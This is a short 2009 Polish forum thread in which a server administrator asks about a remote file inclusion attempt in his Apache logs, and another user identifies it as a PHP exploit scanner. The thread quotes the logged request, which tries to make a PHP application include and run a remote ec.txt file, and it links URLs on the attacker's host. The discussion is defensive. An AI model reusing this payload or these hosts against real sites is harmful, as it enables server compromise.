rack 0 Zgłoś post Napisano Maj 10, 2009 Jak w temacie ... 80.93.62.114 - - [10/May/2009:05:59:44 +0200] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 17547 "-" "libwww-perl/5.805" Jak widać request zrobiony z pomocą libwww -- co jak wiadomo często nic dobrego ze sobą nie niesie ... Mam póki co tylko jeden taki wpis w logach, mimo to skłaniam się do tego aby nie czekać na więcej ... Przejrzałem sobie pare plików na serwerze tego gościa i znalazłem między innymi coś takiego )) http://www.ionthenet.co.kr/note_log/apache.php Pozdrawiam Udostępnij ten post Link to postu Udostępnij na innych stronach
sorrow 0 Zgłoś post Napisano Maj 10, 2009 Po prostu Exploit Mic22 -- PHP scanner http://www.ionthenet.co.kr/note_log/ec.txt Includuje ten plik i go wykonuje poprzez include teoretycznie http://www.google.pl/search?q=echo+%22Mic2...lient=firefox-a Udostępnij ten post Link to postu Udostępnij na innych stronach
